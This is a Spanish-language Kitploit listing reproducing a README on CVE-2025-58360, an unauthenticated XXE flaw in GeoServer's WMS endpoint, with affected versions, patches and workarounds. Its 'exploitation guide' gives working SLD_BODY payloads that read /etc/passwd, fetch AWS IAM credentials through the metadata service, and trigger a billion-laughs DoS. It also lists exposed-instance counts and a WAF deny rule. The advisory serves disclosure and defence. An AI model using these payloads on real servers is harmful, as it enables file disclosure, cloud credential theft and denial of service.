Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Herramientas/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Ver Repositorio
7hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔓 🛰️ 'CVE-2025-58360' El endpoint WMS de GeoServer es vulnerable a un ataque XXE 🌟

GeoServer

🏷️ Información básica

  • CVE ID: CVE-2025-58360
  • Publicado: 📅 25 de noviembre de 2025
  • Última modificación: 📅 25 de noviembre de 2025 (aún fresco al 26 nov)
  • Tipo de vulnerabilidad: XML External Entity (XXE) – CWE-611
  • Software afectado: GeoServer (servidor geoespacial de código abierto escrito en Java)
  • Severidad: 🔥 Alta – Puntuación base CVSS v3.1 7.5
    • Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Explotación activa: 🟡 Aún no observada (26 nov 2025) – pero circulan PoCs públicas
  • Autenticación requerida: ❌ Ninguna – completamente no autenticado
  • Interacción del usuario requerida: ❌ Ninguna

🎨 ¿Qué hace especial (y peligroso) a este fallo?

Este es un XXE clásico pero devastador en el endpoint GetMap del Web Map Service (WMS).
Los atacantes pueden:

  • 📂 Leer cualquier archivo al que tenga acceso el proceso GeoServer (/etc/passwd, geoserver.xml, claves privadas, etc.)
  • 🌐 Realizar Server-Side Request Forgery (SSRF) para escanear redes internas o acceder a endpoints de metadatos (ej. AWS/GCP)
  • 💣 Desencadenar Denegación de Servicio con ataques de expansión de entidades ("billion laughs")
  • 🔗 Potencialmente encadenar con otras fallas para RCE completo (no directo, pero posible en configuraciones incorrectas)

🛡️ Versiones afectadas (Tabla detallada)

ComponenteVersiones vulnerablesCorregido enEstado
GeoServer Independiente2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 Vulnerable
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 Vulnerable
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Vulnerable
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Vulnerable
GeoServer 2.27.x y posteriores–Ya parcheado✅ Seguro

🌍 Exposición global (en tiempo real al 26 nov 2025)

FuenteInstancias expuestasNotas
ZoomEye~49,400app:"GeoServer" search
FOFA~24,000Resultados del último año
Shodan~31,000Puerto 8080 + coincidencia de título
GobySec~20,000Escaneo de red pública

→ ¡Son decenas de miles de servidores potencialmente vulnerables en internet abierto ahora mismo! 🌐

🧨 Guía completa de explotación técnica

Endpoint: POST /geoserver/wms
Parámetro clave: SLD_BODY (permite estilo XML en bruto)
Ruta de código vulnerable: El analizador XML no deshabilita la resolución de entidades externas → XXE clásico.

f77f64d7c92fd31b29d537f5205da524

Ejemplo 1 – Revelación de archivos (/etc/passwd)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ La respuesta contiene el contenido de /etc/passwd 🎉

Ejemplo 2 – SSRF a metadatos internos (ejemplo AWS)

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ Filtra credenciales temporales de AWS si se ejecuta en EC2.

Ejemplo 3 – DoS de billion laughs

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>

→ Consume gigabytes de RAM en segundos 💥

🛠️ Parches oficiales y descargas

VersiónFecha de publicaciónEnlace de descarga
2.27.025 nov 2025https://geoserver.org/release/stable/
2.26.325 nov 2025Parche de rama de mantenimiento
2.25.625 nov 2025Rama soportada anterior

Usuarios de Docker:

docker pull osgeo/geoserver:2.27.0

🔧 Soluciones alternativas (si no puedes parchear de inmediato)

  1. Bloquear XML peligroso con regla WAF/mod_security: Denegar solicitudes que contengan <!ENTITY o SYSTEM "file://
  2. Deshabilitar el parámetro SLD_BODY globalmente (si no es necesario)
  3. Ejecutar GeoServer con sistema de archivos de solo lectura + eliminar capacidades
  4. Poner detrás de un proxy inverso que elimine cuerpos XML para usuarios no autenticados

📢 Referencias oficiales y PoCs

  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • GeoServer Advisory: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • JIRA Ticket: https://osgeo-org.atlassian.net/browse/GEOS-11682
  • Public Safe PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • Plantilla de Nuclei (detección automática): Ya fusionada en la rama principal

⏰ Cronología

FechaEvento
Antes de nov 2025Descubierto autónomamente por el escáner XBOW AI
25 nov 2025Divulgación coordinada → parches publicados
25 nov 2025CVE asignado y publicado
26 nov 2025PoCs se viralizan, los escaneos de exposición se disparan

✨ Palabras finales

Este es un XXE de libro de texto que afecta a una plataforma geoespacial ampliamente desplegada con decenas de miles de instancias expuestas a internet. Los parches se publicaron el mismo día de la divulgación: ¡enorme reconocimiento al equipo de GeoServer por la rapidez! 🏆 Pero la ventana entre la disponibilidad del parche y la explotación masiva se está reduciendo rápidamente.

Si ejecutas GeoServer → actualiza hoy.
No te conviertas en el próximo titular.

¡Mantente seguro, mantente brillante! 🛡️✨

Descargar herramienta